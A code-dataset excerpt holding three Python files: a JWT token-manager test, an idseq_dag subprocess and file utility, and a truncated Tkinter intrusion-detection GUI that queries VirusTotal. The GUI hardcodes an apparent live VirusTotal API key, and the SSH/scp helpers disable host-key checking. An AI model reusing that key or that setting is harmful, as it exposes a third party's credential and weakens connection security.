source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
test_jwt_token_manager.py
|
# pylint: disable=missing-docstring,protected-access,abstract-class-instantiated
import time
import threading
from typing import Optional
import jwt
import pytest
from ibm_cloud_sdk_core import JWTTokenManager, DetailedResponse
class JWTTokenManagerMockImpl(JWTTokenManager):
def __init__(self, url: Optional[str] = None, access_token: Optional[str] = None) -> None:
self.url = url
self.access_token = access_token
self.request_count = 0 # just for tests to see how many times request was called
super().__init__(url, disable_ssl_verification=access_token,
token_name='access_token')
def request_token(self) -> DetailedResponse:
self.request_count += 1
current_time = int(time.time())
token_layout = {
"username": "dummy",
"role": "Admin",
"permissions": [
"administrator",
"manage_catalog"
],
"sub": "admin",
"iss": "sss",
"aud": "sss",
"uid": "sss",
"iat": current_time,
"exp": current_time + 3600
}
access_token = jwt.encode(token_layout, 'secret', algorithm='HS256',
headers={'kid': '230498151c214b788dd97f22b85410a5'})
response = {"access_token": access_token,
"token_type": "Bearer",
"expires_in": 3600,
"expiration": current_time + 3600,
"refresh_token": "jy4gl91BQ",
"from_token_manager": True
}
time.sleep(0.5)
return response
def _get_current_time() -> int:
return int(time.time())
def test_get_token():
url = "https://iam.cloud.ibm.com/identity/token"
token_manager = JWTTokenManagerMockImpl(url)
old_token = token_manager.get_token()
assert token_manager.token_info.get('expires_in') == 3600
assert token_manager._is_token_expired() is False
token_manager.token_info = {"access_token": "old_dummy",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": time.time(),
"refresh_token": "jy4gl91BQ"
}
token = token_manager.get_token()
assert token == old_token
# expired token:
token_manager.expire_time = _get_current_time() - 300
token = token_manager.get_token()
assert token != "old_dummy"
assert token_manager.request_count == 2
def test_paced_get_token():
url = "https://iam.cloud.ibm.com/identity/token"
token_manager = JWTTokenManagerMockImpl(url)
threads = []
for _ in range(10):
thread = threading.Thread(target=token_manager.get_token)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert token_manager.request_count == 1
def test_is_token_expired():
token_manager = JWTTokenManagerMockImpl(None, access_token=None)
assert token_manager._is_token_expired() is True
token_manager.expire_time = _get_current_time() + 3600
assert token_manager._is_token_expired() is False
token_manager.expire_time = _get_current_time() - 3600
assert token_manager._is_token_expired()
def test_abstract_class_instantiation():
with pytest.raises(TypeError) as err:
JWTTokenManager(None)
assert str(err.value) == "Can't instantiate abstract class " \
"JWTTokenManager with abstract methods " \
"request_token"
def test_disable_ssl_verification():
token_manager = JWTTokenManagerMockImpl('https://iam.cloud.ibm.com/identity/token')
token_manager.set_disable_ssl_verification(True)
assert token_manager.disable_ssl_verification is True
|
command.py
|
import multiprocessing
import random
import subprocess
import sys
import os
import threading
import time
import glob as _glob
import shutil
import pathlib
from functools import wraps
from typing import Union
import pkg_resources
import idseq_dag.util.log as log
from idseq_dag.util.trace_lock import TraceLock
import idseq_dag.util.command_patterns as command_patterns
class Updater(object):
"""Base for CommandTracker."""
def __init__(self, update_period, update_function):
self.update_period = update_period
self.update_function = update_function
self.timer_thread = None
self.exited = False
self.t_start = time.time()
def relaunch(self, initial_launch=False):
if self.exited:
return
if self.timer_thread and not initial_launch:
t_elapsed = time.time() - self.t_start
self.update_function(t_elapsed)
self.timer_thread = threading.Timer(self.update_period, self.relaunch)
self.timer_thread.name = "TimerThread"
self.timer_thread.start()
def __enter__(self):
self.relaunch(initial_launch=True)
return self
def __exit__(self, *args):
self.timer_thread.cancel()
self.exited = True
class CommandTracker(Updater):
"""CommandTracker is for running external and remote commands and
monitoring their progress with log updates and timeouts.
"""
lock = TraceLock("CommandTracker", multiprocessing.RLock())
count = multiprocessing.Value('i', 0)
def __init__(self, update_period=15):
super(CommandTracker, self).__init__(
update_period, self.print_update_and_enforce_timeout)
# User can set the watchdog to a function that takes self.id and
# t_elapsed as single arg
self.proc = None # Value indicates registered subprocess.
self.timeout = None
self.t_sigterm_sent = None # First sigterm, then sigkill.
self.t_sigkill_sent = None
self.grace_period = update_period / 2.0
with CommandTracker.lock:
self.id = CommandTracker.count.value
CommandTracker.count.value += 1
def print_update_and_enforce_timeout(self, t_elapsed):
"""Log an update after every polling period to indicate the command is
still active.
"""
if self.proc is None or self.proc.poll() is None:
log.write("Command %d still running after %3.1f seconds." %
(self.id, t_elapsed))
else:
# This should be uncommon, unless there is lengthy python
# processing following the command in the same CommandTracker
# "with" block. Note: Not to be confused with post-processing
# on the data.
log.write(
"Command %d still postprocessing after %3.1f seconds." %
(self.id, t_elapsed))
self.enforce_timeout(t_elapsed)
def enforce_timeout(self, t_elapsed):
"""Check the timeout and send SIGTERM then SIGKILL to end a command's
execution.
"""
if self.timeout is None or not self.proc or \
t_elapsed <= self.timeout or self.proc.poll() is not None:
# Skip if unregistered subprocess, subprocess not yet timed out,
# or subprocess already exited.
pass
elif not self.t_sigterm_sent:
# Send SIGTERM first.
msg = "Command %d has exceeded timeout of %3.1f seconds. " \
"Sending SIGTERM." % (self.id, self.timeout)
log.write(msg)
self.t_sigterm_sent = time.time()
self.proc.terminate()
elif not self.t_sigkill_sent:
# Grace_period after SIGTERM, send SIGKILL.
if time.time() > self.t_sigterm_sent + self.grace_period:
msg = "Command %d still alive %3.1f seconds after " \
"SIGTERM. Sending SIGKILL." % (self.id, time.time() - self.t_sigterm_sent)
log.write(msg)
self.t_sigkill_sent = time.time()
self.proc.kill()
else:
msg = "Command %d still alive %3.1f seconds after " \
"SIGKILL." % (self.id, time.time() - self.t_sigkill_sent)
log.write(msg)
class ProgressFile(object):
def __init__(self, progress_file):
self.progress_file = progress_file
self.tail_subproc = None
def __enter__(self):
# TODO: Do something else here. Tail gets confused if the file
# pre-exists. Also need to rate-limit.
if self.progress_file:
self.tail_subproc = subprocess.Popen(
"touch {pf} ; tail -f {pf}".format(pf=self.progress_file),
shell=True, executable="/bin/bash")
return self
def __exit__(self, *args):
if self.tail_subproc:
# TODO: Do we need to join the tail subproc after killing it?
self.tail_subproc.kill()
def run_in_subprocess(target):
"""
Decorator that executes a function synchronously in a subprocess.
Use case:
thread 1:
compute_something(x1, y1, z1)
thread 2:
compute_something(x2, y2, z2)
thread 3:
compute_something(x3, y3, z3)
If compute_something() is CPU-intensive, the above threads won't really run
in parallel because of the Python global interpreter lock (GIL). To avoid
this problem without changing the above code, simply decorate the definition
of compute_something() like so:
@run_in_subprocess
def compute_something(x, y, z):
...
Typical subprocess limitations or caveats apply:
a. The caller can't see any value returned by the decorated function.
It should output to a file, a pipe, or a multiprocessing queue.
b. Changes made to global variables won't be seen by parent process.
c. Use multiprocessing semaphores/locks/etc, not their threading versions.
Tip: If input from the same file is needed in all invocations of the
decorated function, do the I/O before the first call, to avoid accessing
the file multiple times.
"""
@wraps(target)
def wrapper(*args, **kwargs):
with log.print_lock:
p = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
p.start()
p.join()
if p.exitcode != 0:
raise RuntimeError(f"Failed {target.__qualname__} with code {p.exitcode} on {list(args)}, {kwargs}") # singleton list prints prettier than singleton tuple
return wrapper
def retry(operation, MAX_TRIES=3):
"""Retry decorator for external commands."""
# Note the use of a separate random generator for retries so transient
# errors won't perturb other random streams used in the application.
invocation = [0] # a python trick, without which the nested function would not increment a counter defined in the parent
@wraps(operation)
def wrapped_operation(*args, **kwargs):
randgen = None
remaining_attempts = MAX_TRIES
delay = 1.0
while remaining_attempts > 1:
try:
t_start = time.time()
return operation(*args, **kwargs)
except:
t_end = time.time()
if randgen == None:
invocation[0] += 1
randgen = random.Random(os.getpid() * 10000 + invocation[0]).random # seed based on pid so subprocesses won't retry in lockstep
if t_end - t_start > 30:
# For longer operations, the delay should increase, so that the backoff will meaningfully reduce load on the failing service.
delay = (t_end - t_start) * 0.2
wait_time = delay * (1.0 + 2.0 * randgen())
log.write(f"Sleeping {wait_time} seconds before retry {MAX_TRIES - remaining_attempts + 1} of {operation} with {args}, {kwargs}.")
time.sleep(wait_time)
delay *= 3.0
remaining_attempts -= 1
# The last attempt is outside try/catch so caller can handle exception
return operation(*args, **kwargs)
return wrapped_operation
@retry
def execute_with_retries(command,
progress_file=None,
timeout=None,
grace_period=None,
merge_stderr=False,
log_context_mode=log.LogContextMode.START_END_LOG_EVENTS):
execute(
command=command,
progress_file=progress_file,
timeout=timeout,
grace_period=grace_period,
merge_stderr=merge_stderr,
log_context_mode=log_context_mode
)
def execute(command: Union[command_patterns.CommandPattern, str],
progress_file: str = None,
timeout: int = None,
grace_period: int = None,
capture_stdout: bool = False,
merge_stderr: bool = False,
log_context_mode: log.LogContextMode = log.LogContextMode.START_END_LOG_EVENTS) -> Union[str, None]:
"""Primary way to start external commands in subprocesses and handle
execution with logging.
"""
if not isinstance(command, command_patterns.CommandPattern):
# log warning if using legacy format
log.write(warning=True, message=f"Command parameter is using legacy type str. Use idseq_dag.util.command_patterns.", obj_data={"cmd": command, "type": type(command)})
cmd = command_patterns.ShellScriptCommand(script=command, args=[])
else:
cmd = command
with CommandTracker() as ct:
log_values = {"cid": f"Command {ct.id}", "command": cmd.as_dict()}
with log.log_context('command_execute', values=log_values, log_context_mode=log_context_mode) as lctx:
with ProgressFile(progress_file):
if timeout:
ct.timeout = timeout
if grace_period:
ct.grace_period = grace_period
if capture_stdout:
# Capture only stdout. Child stderr = parent stderr unless
# merge_stderr specified. Child input = parent stdin.
ct.proc = cmd.open(
stdin=sys.stdin.fileno(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT if merge_stderr else sys.stderr.fileno()
)
stdout, _ = ct.proc.communicate()
else:
# Capture nothing. Child inherits parent stdin/out/err.
ct.proc = cmd.open()
ct.proc.wait()
stdout = None
lctx.values.update({"returncode": ct.proc.returncode})
if ct.proc.returncode:
raise subprocess.CalledProcessError(ct.proc.returncode,
str(command), stdout)
if capture_stdout:
return stdout
def execute_with_output(command: Union[command_patterns.CommandPattern, str],
progress_file: str = None,
timeout: int = None,
grace_period: int = None,
merge_stderr: bool = False,
log_context_mode: log.LogContextMode = log.LogContextMode.START_END_LOG_EVENTS):
return execute(
command=command,
progress_file=progress_file,
timeout=timeout,
grace_period=grace_period,
capture_stdout=True,
merge_stderr=merge_stderr,
log_context_mode=log_context_mode
).decode('utf-8')
def make_dirs(path: str):
if not os.path.isdir(path):
with log.log_context(context_name="command.make_dirs", values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.makedirs(path, exist_ok=True)
def write_text_to_file(text: str, file_path: str):
with log.log_context(context_name='command.write_text_to_file', values={'path': file_path, 'text': text}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
with open(file_path, "w") as f:
print(text, file=f)
def copy_file(src: str, dst: str):
with log.log_context(context_name='command.copy_file', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
shutil.copy(src, dst)
def move_file(src: str, dst: str):
with log.log_context(context_name='command.move_file', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
shutil.move(src, dst)
def rename(src: str, dst: str):
with log.log_context(context_name='command.rename', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.rename(src, dst)
def touch(path, exist_ok=True):
with log.log_context(context_name='command.touch', values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
pathlib.Path(path).touch(exist_ok=exist_ok)
def remove_file(file_path: str):
with log.log_context(context_name='command.remove_file', values={'path': file_path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.remove(file_path)
def remove_rf(path: str):
'''Mimics behavior of rm -rf linux command.'''
def _remove_entry(path_entry):
if os.path.isdir(path_entry) and not os.path.islink(path_entry):
shutil.rmtree(path_entry)
elif os.path.exists(path_entry):
os.remove(path_entry)
with log.log_context(context_name='command.remove_rf', values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
path_list = _glob.glob(path)
if len(path_list) == 1 and path_list[0] == path:
_remove_entry(path)
else:
for path_entry in path_list:
with log.log_context(context_name='command.remove_rf._remove_entry', values={'path_entry': path_entry}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
_remove_entry(path_entry)
def chmod(path: str, mode: int):
'''Execute a chmod operation.
Parameter 'mode' must be in octal format. Ex: chmod('/tmp/test.txt', 0o400)'''
with log.log_context(context_name='command.chmod', values={'path': path, 'mode': oct(mode)}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.chmod(path, mode)
def glob(glob_pattern: str, strip_folder_names: bool = False, max_results: int = 0):
'''
Execute a glob pattern to local file system.
Parameters:
glob_pattern(str): A glob pattern. Ex: /tmp/*.gz
max_results(int): Limit the number of results to be returned. Zero means not limit is set.
strip_folder_names(bool): Return only the file names without folder information.
Ex: "/tmp/123.txt" is returned as "123.txt"
Returns:
Array of strings containing the files found. Empty array if none is found.
'''
values = {'glob_pattern': glob_pattern, 'strip_folder_names': strip_folder_names, 'max_results': max_results}
with log.log_context(context_name='command.glob', values=values, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
results = _glob.glob(glob_pattern)
results.sort()
if max_results > 0:
results = results[:max_results]
if strip_folder_names:
results = list(map(os.path.basename, results))
values["results"] = results
return results
def scp(key_path, remote_username, instance_ip, remote_path, local_path):
assert " " not in key_path
assert " " not in remote_path
assert " " not in local_path
# ServerAliveInterval to fix issue with containers keeping open an SSH
# connection even after worker machines had finished running.
return command_patterns.SingleCommand(
cmd="scp",
args=[
"-o", "StrictHostKeyChecking no",
"-o", "ConnectTimeout 15",
"-o", "ServerAliveInterval 60",
"-i", key_path,
f"{remote_username}@{instance_ip}:{remote_path}",
local_path
]
)
def remote(base_command, key_path, remote_username, instance_ip):
# ServerAliveInterval to fix issue with containers keeping open an SSH
# connection even after worker machines had finished running.
return command_patterns.SingleCommand(
cmd="ssh",
args=[
"-o", "StrictHostKeyChecking no",
"-o", "ConnectTimeout 15",
"-o", "ServerAliveInterval 60",
"-i", key_path,
f"{remote_username}@{instance_ip}",
base_command
]
)
def get_resource_filename(root_relative_path, package='idseq_dag'):
'''
Given a file path relative to the root of the package, it returns an absolute path.
Example:
command.get_resource_filename("scripts/fastq-fasta-line-validation.awk")
will return a string containing:
/app/idseq_dag/scripts/fastq-fasta-line-validation.awk
'''
return pkg_resources.resource_filename(package, root_relative_path)
class LongRunningCodeSection(Updater):
"""
Make sure we print something periodically while a long section of code is running.
"""
lock = TraceLock("LongRunningCodeSection", multiprocessing.RLock())
count = multiprocessing.Value('i', 0)
def __init__(self, name, update_period=15):
super(LongRunningCodeSection, self).__init__(
update_period, self.print_update)
with LongRunningCodeSection.lock:
self.id = LongRunningCodeSection.count.value
LongRunningCodeSection.count.value += 1
self.name = name
def print_update(self, t_elapsed):
"""Log an update after every polling period to indicate the code section is
still active.
"""
log.write("LongRunningCodeSection %d (%s) still running after %3.1f seconds." %
(self.id, self.name, t_elapsed))
|
HIDPS.pyw
|
import fcntl, easygui, logging, time, urllib, urllib2, sys, simplejson, ttk, multiprocessing, Queue, os, netifaces
from Tkinter import *
from threading import *
from PIL import Image, ImageTk
from netfilter import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
inc_txt_str = " "
out_txt_str = " "
inc_packet = 0
inc_packet_size = 0.0
out_packet = 0
out_packet_size = 0.0
pSniff = 0
pParse = 0
pVT = 0
subdirectory = "IPDB"
subdirectory1="Icons"
wl = ['google', 'dropbox', 'facebook', 'valve', 'amazon', 'apple']
bl = ['tk', 'crack', 'xxx', 'hack', 'crack']
if not os.path.exists(os.path.join(subdirectory)):
os.makedirs(os.path.join(subdirectory))
with open(os.path.join(subdirectory, "parseip.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "blacklist.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "whitelist.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "greylist.db"), "a") as parse_ip:
parse_ip.write("")
def exitClick(main_win):
main_win.destroy()
main_win.quit()
sys.exit()
def optionsON():
global pauseButton,listframe,whiteButton,blackButton,greyButton
pauseButton=Button(border_buttons1,text="Pause",command=pauseSniff)
pauseButton.pack(side="left",ipadx=10,pady=7)
listframe=Frame(parse_win)
whiteButton=Button(listframe,text="Clear Whitelist", command=clearWhitelist)
whiteButton.grid(row=0, column=0, ipadx=10,pady=7)
blackButton=Button(listframe,text="Clear Blacklist", command=clearBlacklist)
blackButton.grid(row=0, column=2, ipadx=10,pady=7)
greyButton=Button(listframe,text="Clear Greylist", command=clearGreylist)
greyButton.grid(row=0, column=4,ipadx=10,pady=7)
listframe.grid(row=4, column=0, columnspan=3)
if Omenu.entrycget(0,"state")==NORMAL:
Omenu.entryconfigure(0,state=DISABLED)
if Omenu.entrycget(2,"state")==DISABLED:
Omenu.entryconfigure(2,state=NORMAL)
def clearWhitelist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "whitelist.db"), "w") as parse_ip:
parse_ip.write("")
whiteltext.configure(state=NORMAL)
whiteltext.delete(1.0,END)
whiteltext.configure(state=DISABLED)
def clearBlacklist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "blacklist.db"), "w") as parse_ip:
parse_ip.write("")
blackltext.configure(state=NORMAL)
blackltext.delete(1.0,END)
blackltext.configure(state=DISABLED)
def clearGreylist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "greylist.db"), "w") as parse_ip:
parse_ip.write("")
greyltext.configure(state=NORMAL)
greyltext.delete(1.0,END)
greyltext.configure(state=DISABLED)
def optionsOFF():
pauseButton.pack_forget()
listframe.destroy()
if Omenu.entrycget(0,"state")==DISABLED:
Omenu.entryconfigure(0,state=NORMAL)
if Omenu.entrycget(2,"state")==NORMAL:
Omenu.entryconfigure(2,state=DISABLED)
def pauseSniff():
thrSniff.stahp()
if pauseButton["text"]=="Pause":
pauseButton["text"]="Resume"
pauseButton.configure(command=resumeSniff)
def resumeSniff():
global pSniff
pSniff = 0
if pauseButton["text"]=="Resume":
pauseButton["text"]="Pause"
pauseButton.configure(command=pauseSniff)
def hideClick():
parse_win.withdraw()
def pauseparsing():
prog.stop()
prog_stat.set(str("Status: Parsing stopped"))
image1=Image.open(os.path.join(subdirectory1,"Play.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
startstopButton.configure(command=resumeparsing, image=photo1)
startstopButton.image=photo1
def resumeparsing():
prog.start(50);
prog_stat.set(str("Status: Parsing in progress"))
image1=Image.open(os.path.join(subdirectory1,"Pause.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
startstopButton.configure(command=pauseparsing, image=photo1)
startstopButton.image=photo1
def ipTables():
#GUI
iptable= Toplevel()
iptable.title("System IP Table")
iptable.resizable(1,1)
iptable.withdraw()
iptable.deiconify()
iptable_frame= Frame(iptable)
iptable_frame.grid(row=3, columnspan=3)
iptable_textbox = Text(iptable_frame,width=screen_width/20,height=screen_height/30, bg="white", fg="black", state="normal")
iptable_textbox.pack(fill=BOTH, expand=YES, side="left")
table = iptc.Table(iptc.Table.FILTER)
chain = iptc.Chain(table, 'OUTPUT')
for rule in chain.rules:
(packets, bytes) = rule.get_counters()
print packets, bytes
for chain in table.chains:
print "======================="
print "Chain ", chain.name
for rule in chain.rules:
print "Rule", "proto:", rule.protocol, "src:", rule.src, "dst:", rule.dst, "in:", rule.in_interface, "out:", rule.out_interface,
print "Matches:",
for match in rule.matches:
print match.name,
print "Target:",
print rule.target.name
print "======================="
def aboutClick():
about_win = Toplevel()
about_win.title("About")
about_win.resizable(1,1)
about_win.withdraw()
about_win.deiconify()
about_frame=Frame(about_win)
about_frame.grid(row=3,columnspan=3)
about_textbox = Text(about_frame, width=screen_width/20,height=screen_height/30, bg="black", fg="green", state="normal")
about_textbox.pack(fill=BOTH, expand=YES, side="left")
about_text="\n\n\tHH HH IIIII DDDDD PPPPPP SSSSS\n\tHH HH III DD DD PP PP SS \n\tHHHHHHH III DD DD PPPPPP SSSSS \n\tHH HH III DD DD PP SS\n\tHH HH IIIII DDDDDD PP SSSSS \n\n The Heuristic Intrusion Detection and Prevention System\n\n\nA lightweight, intelligent security suite for your linux servers\nVersion: 0.1\nVisit http://www.vaptlab.com/HIDPS\n\nCreated by:\nKirit Sankar Gupta\nDiptarshi Sen\nPiyali Gupta"
about_textbox.insert(END, about_text)
about_textbox.configure(state=DISABLED)
def parseUI():
global parse_win, parseips, prog_stat, startstopButton, tpi, prog_label, prog, spi, whitel, whiteltext, whitescroll, blackl, blackltext, blackscroll, greyl, greyltext, greyscroll
parse_win = Toplevel()
parse_win.title("Parsing IPs")
parse_win.resizable(1,1)
#parse_win.overrideredirect(True)
parse_win.withdraw()
parseips = Frame(parse_win)
parse_win._offsetx = 0
parse_win._offsety = 0
parse_win.protocol('WM_DELETE_WINDOW', parse_win.withdraw)
tpi = Text(parseips, width=screen_width/12, height=screen_height/50, bg="black", fg="white")
tpi.pack(fill=BOTH, expand=YES, side="left")
parseips.grid(row=0,column=0, columnspan=3, sticky=NW)
with open(os.path.join(subdirectory, "parseip.db"), 'r') as piList:
addtoPI = piList.read()
tpi.configure(state=NORMAL)
tpi.insert(END, addtoPI)
tpi.see(END)
tpi.update_idletasks()
tpi.configure(state=DISABLED)
whitel= Frame(parse_win)
whiteltext= Text(whitel, width=screen_width/32, height=screen_height/45, bg="white", fg="black")
whiteltext.pack(fill=BOTH, expand=YES, side="left")
whitescroll = Scrollbar(whitel)
whitescroll.pack(side="right", fill="y")
whitescroll.config(command=whiteltext.yview)
whiteltext.config(yscrollcommand=whitescroll.set)
whitel.grid(row=3,column=0, sticky=W)
with open(os.path.join(subdirectory, "whitelist.db"), 'r') as wlList:
addtoWL = wlList.read()
whiteltext.configure(state=NORMAL)
whiteltext.insert(END, addtoWL)
whiteltext.see(END)
whiteltext.update_idletasks()
whiteltext.configure(state=DISABLED)
blackl= Frame(parse_win)
blackltext= Text(blackl, width=screen_width/32, height=screen_height/45, bg="black", fg="white")
blackltext.pack(fill=BOTH, expand=YES, side="left")
blackscroll = Scrollbar(blackl)
blackscroll.pack(side="right", fill="y")
blackscroll.config(command=blackltext.yview)
blackltext.config(yscrollcommand=blackscroll.set)
blackl.grid(row=3,column=1, sticky=E)
with open(os.path.join(subdirectory, "blacklist.db"), 'r') as blList:
addtoBL = blList.read()
blackltext.configure(state=NORMAL)
blackltext.insert(END, addtoBL)
blackltext.see(END)
blackltext.update_idletasks()
blackltext.configure(state=DISABLED)
greyl= Frame(parse_win)
greyltext= Text(greyl, width=screen_width/32, height=screen_height/45, bg="grey", fg="red")
greyltext.pack(fill=BOTH, expand=YES, side="left")
greyscroll = Scrollbar(greyl)
greyscroll.pack(side="right", fill="y")
greyscroll.config(command=greyltext.yview)
greyltext.config(yscrollcommand=greyscroll.set)
greyl.grid(row=3,column=2, sticky=E)
with open(os.path.join(subdirectory, "greylist.db"), 'r') as glList:
addtoGL = glList.read()
greyltext.configure(state=NORMAL)
greyltext.insert(END, addtoGL)
greyltext.see(END)
greyltext.update_idletasks()
greyltext.configure(state=DISABLED)
#buttonsGUI
image1=Image.open(os.path.join(subdirectory1,"Play.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
button_frame = Frame(parseips)
startstopButton = Button(button_frame, compound=TOP, width=90,height=90, image=photo1, command=resumeparsing)
startstopButton.image=photo1
startstopButton.grid(row=2,column=3)
image2=Image.open(os.path.join(subdirectory1,"Hide.png"))
image2=image2.resize((90,90), Image.BICUBIC)
photo2= ImageTk.PhotoImage(image2)
hidebutton = Button(button_frame,command=hideClick,compound=TOP,width=90, height=90, image=photo2)
hidebutton.image=photo2
hidebutton.grid(row=4,column=3)
button_frame.pack(side="right")
spi = Scrollbar(parseips)
spi.pack(side="right", fill="y")
spi.config(command=tpi.yview)
tpi.config(yscrollcommand=spi.set)
s=ttk.Style()
s.theme_use('clam')
s.configure("red.Horizontal.TProgressbar", foreground='red', background='red')
prog= ttk.Progressbar(parse_win, style="red.Horizontal.TProgressbar", mode='indeterminate', orient='horizontal', length=500, maximum=50)
prog_stat = StringVar()
#prog_stat = "Parsing stopped"
prog_label = Label(parse_win, borderwidth=2,height=1,width=60, font='verdana 10', textvariable=prog_stat);
prog_label.grid(row=2,column=0, columnspan=3)
prog.grid(row=1, column=0, columnspan=3)
def parseClick ():
global thrVT
parse_win.deiconify()
thrVT = Thread(target=vtLookup, args=("http://executivecoaching.co.il",))
thrVT.start()
def vtLookup (testIP):
url = "https://www.virustotal.com/vtapi/v2/url/scan"
#testIP = "http://executivecoaching.co.il"
parameters = {"url": testIP, "apikey": "95c948ffe8c50d27b0087b71c04c1b0ccf074007fe7fa0bc48bf4094063d7088"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
json = response.read()
response_dict = simplejson.loads(json)
scan_id = response_dict['scan_id']
scan_id=str(scan_id)
scanID, dateID = scan_id.split('-')
url = "https://www.virustotal.com/vtapi/v2/url/report"
parameters = {"resource": scanID, "apikey": "95c948ffe8c50d27b0087b71c04c1b0ccf074007fe7fa0bc48bf4094063d7088"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
json = response.read()
response_dict = simplejson.loads(json)
positives = response_dict['positives']
total = response_dict['total']
rating = float(positives)/total
rating = rating*20
print "Danger rating of " + str(testIP) + " is: " + str(rating) + "\n"
if rating < 1:
text_file = open(os.path.join(subdirectory, "whitelist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
text_file.close()
elif rating < 5:
text_file = open(os.path.join(subdirectory, "greylist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
text_file.close()
else:
text_file = open(os.path.join(subdirectory, "blacklist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
#ACAAAA text_file.close()
def mainUI():
global main_win, border_in, t, border_out, t1, border_misc, t2, border_buttons, border_buttons1, border_buttons2, countinPackets, countoutPackets, inpCount, outpCount, aboutbutton, quitButton, viewip, parseButton, screen_height, screen_width,pauseButton,Omenu
main_win = Tk()
mwTitle="The Heuristic IDPS: Now listening on Interface "
mwTitle=mwTitle+str(interface)
main_win.title(mwTitle)
main_win.resizable(1, 1)
#main_win.overrideredirect(True)
main_win.withdraw()
screen_width = main_win.winfo_screenwidth()
screen_height = main_win.winfo_screenheight()
menu=Menu(main_win)
main_win.config(menu=menu)
fileMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
subMenu=Menu(fileMenu,tearoff=False,bd=3,relief=RAISED)
subMenu.add_command(label="Select Interface",command=lambda:thrSniff.chInterface,activeforeground="green")
fileMenu.add_cascade(label="Preferences",menu=subMenu,activeforeground="green")
fileMenu.add_separator()
fileMenu.add_command(label="Exit",command=lambda:exitClick(main_win),activeforeground="green")
menu.add_cascade(label="File",menu=fileMenu,activeforeground="green",state=NORMAL)
optionMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
Omenu=Menu(optionMenu,tearoff=False,bd=3,relief=RAISED)
Omenu.add_command(label="ON",command=optionsON,activeforeground="green")
Omenu.entryconfigure(1,state=NORMAL)
Omenu.add_command(label="OFF",command=optionsOFF,activeforeground="green")
Omenu.entryconfigure(2,state=DISABLED)
menu.add_cascade(label="Options",menu=optionMenu,activeforeground="green",state=NORMAL)
optionMenu.add_cascade(label="Advanced Options",menu=Omenu,activeforeground="green",state=NORMAL)
helpMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
menu.add_cascade(label="Help",menu=helpMenu,activeforeground="green")
helpMenu.add_command(label="About",command=aboutClick,activeforeground="green")
border_in = Frame(main_win)
t = Text(border_in, width=screen_width/30,height=screen_height/20,bg="black", fg="red")
t.pack(fill=BOTH, expand=YES, side="left")
s = Scrollbar(border_in)
s.pack(side="right", fill="y")
s.config(command=t.yview)
t.config(yscrollcommand=s.set)
border_in.grid(row=0,column=0,columnspan=1 ,sticky=W)
border_out = Frame(main_win)
t1 = Text(border_out, width=screen_width/30,height=screen_height/20,bg="black", fg="green")
t1.pack(side="left", fill="both", expand=YES)
s1 = Scrollbar(border_out)
s1.pack(side="right", fill="y")
s1.config(command=t1.yview)
t1.config(yscrollcommand=s1.set)
border_out.grid(row=0,column=1,columnspan=1 ,sticky=W)
border_misc = Frame(main_win)
t2 = Text(border_misc, width=screen_width/20,height=screen_height/20, bg="black", fg="white")
t2.pack(side="left", fill="both", expand=YES)
s2 = Scrollbar(border_misc)
t2.config(yscrollcommand=s2.set)
s2.pack(side="right", fill="y")
s2.config(command=t2.yview)
border_misc.grid(row=0,column=2,columnspan=2, sticky=W)
border_buttons = Frame(main_win)
border_buttons.grid(row=4,column=0,columnspan=1)
border_buttons1 = Frame(main_win)
border_buttons1.grid(row=4,column=1,columnspan=1)
border_buttons2 = Frame(main_win)
border_buttons2.grid(row=4,column=2,columnspan=2)
inpCount = StringVar()
countinPackets=Label(border_buttons2,borderwidth=2,height=1,width=60, textvariable=inpCount)
countinPackets.pack(fill=BOTH, expand=YES, side="top")
outpCount = StringVar()
countoutPackets=Label(border_buttons2,borderwidth=2,height=1,width=60, textvariable=outpCount)
countoutPackets.pack(fill=BOTH, expand=YES, side="top")
image1=Image.open(os.path.join(subdirectory1,"quit.png"))
image1=image1.resize((90,32), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
quitButton=Button(border_buttons,image=photo1,width=70,height=30,command=lambda:exitClick(main_win))
quitButton.image=photo1
quitButton.pack(side="left",ipadx=20,pady=7)
image=Image.open(os.path.join(subdirectory1,"IP Table.png"))
image=image.resize((90,32), Image.BICUBIC)
